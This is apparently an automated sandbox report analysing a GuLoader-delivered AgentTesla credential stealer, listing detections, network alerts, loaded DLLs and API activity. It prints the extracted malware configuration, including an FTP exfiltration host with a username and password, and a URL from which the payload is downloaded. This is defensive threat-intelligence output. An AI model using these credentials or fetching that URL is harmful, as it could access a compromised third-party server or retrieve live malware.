Edit tour

Windows Analysis Report
rendel#U00e9s_1023200000000000305.exe

Overview

General Information

Sample name:	rendel#U00e9s_1023200000000000305.exe renamed because original name is a hash value
Original sample name:	rendels_1023200000000000305.exe
Analysis ID:	1571444
MD5:	ff83f495808f8837a41405726ce9d7b9
SHA1:	186bb042c4a61b7905ed62bde58f062725897192
SHA256:	186a1d9c4703d9498b26d88451e31018ff66b7f9f135e0ed93f9ac10aa485753
Tags:	exeguloaderHUNuser-smica83
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

rendel#U00e9s_1023200000000000305.exe (PID: 3840 cmdline: "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe" MD5: FF83F495808F8837A41405726CE9D7B9)

rendel#U00e9s_1023200000000000305.exe (PID: 4956 cmdline: "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe" MD5: FF83F495808F8837A41405726CE9D7B9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2171267771.000000000074C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2172384343.000000000323D000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.3278956920.00000000017CD000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 3840	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 4956	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 4 entries

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T11:51:25.411752+0100	2029927	1	A Network Trojan was detected	192.168.2.5	49720	86.107.36.93	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T11:51:26.587377+0100	2855542	1	A Network Trojan was detected	192.168.2.5	49728	86.107.36.93	35590	TCP
2024-12-09T11:51:26.708391+0100	2855542	1	A Network Trojan was detected	192.168.2.5	49728	86.107.36.93	35590	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T11:51:18.116653+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49707	185.33.55.26	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rendel#U00e9s_1023200000000000305.exe

Avira: detected

Found malware configuration

Source: rendel#U00e9s_1023200000000000305.exe.3840.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}

Multi AV Scanner detection for submitted file

Source: rendel#U00e9s_1023200000000000305.exe

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: rendel#U00e9s_1023200000000000305.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: rendel#U00e9s_1023200000000000305.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405D74
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_0040290B FindFirstFileW,	2_2_0040290B
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_0040699E FindFirstFileW,FindClose,	2_2_0040699E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49728 -> 86.107.36.93:35590
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49720 -> 86.107.36.93:21

Source: global traffic

TCP traffic: 192.168.2.5:49728 -> 86.107.36.93:35590

Source: Joe Sandbox View

IP Address: 86.107.36.93 86.107.36.93

Source: Joe Sandbox View

ASN Name: DIALTELECOMRO DIALTELECOMRO

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49707 -> 185.33.55.26:80

Source: unknown

FTP traffic detected: 86.107.36.93:21 -> 192.168.2.5:49720 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic

HTTP traffic detected: GET /image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: akonnyuszerkezet.huCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: akonnyuszerkezet.hu
Source: global traffic	DNS traffic detected: DNS query: ftp.carbognin.it

Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280464219.0000000002930000.00000004.00001000.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin
Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.biny
Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B3D000.00000004.00000800.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.carbognin.it
Source: rendel#U00e9s_1023200000000000305.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405809

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403640
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_00403640

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Windows\resources\funks	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	File created: C:\Windows\resources\funks\viklingerne	Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_00406D5F	0_2_00406D5F
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_6FC61BFF	0_2_6FC61BFF
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00406D5F	2_2_00406D5F
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_001193F4	2_2_001193F4
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00114A58	2_2_00114A58
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_0011CB38	2_2_0011CB38
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00113E40	2_2_00113E40
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00114188	2_2_00114188
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00119BC8	2_2_00119BC8
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357CBCD0	2_2_357CBCD0
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357C3F38	2_2_357C3F38
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357C0040	2_2_357C0040
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357CDBF9	2_2_357CDBF9
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357C2AF0	2_2_357C2AF0
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357C4FE0	2_2_357C4FE0
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_357C3223	2_2_357C3223
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_35C9CA30	2_2_35C9CA30
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_35C9B780	2_2_35C9B780
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_35C9FA4C	2_2_35C9FA4C
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_35C9A198	2_2_35C9A198
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00119EA5	2_2_00119EA5

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Code function: String function: 00402DA6 appears 51 times

Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rendel#U00e9s_1023200000000000305.exe
Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300615018.0000000032929000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rendel#U00e9s_1023200000000000305.exe

Source: rendel#U00e9s_1023200000000000305.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/9@2/2

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403640
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Code function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_00403640

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AB5

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly

Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

File created: C:\Users\user\AppData\Local\Temp\nsr3831.tmp

Jump to behavior

Source: rendel#U00e9s_1023200000000000305.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rendel#U00e9s_1023200000000000305.exe

ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

File read: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Process created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe

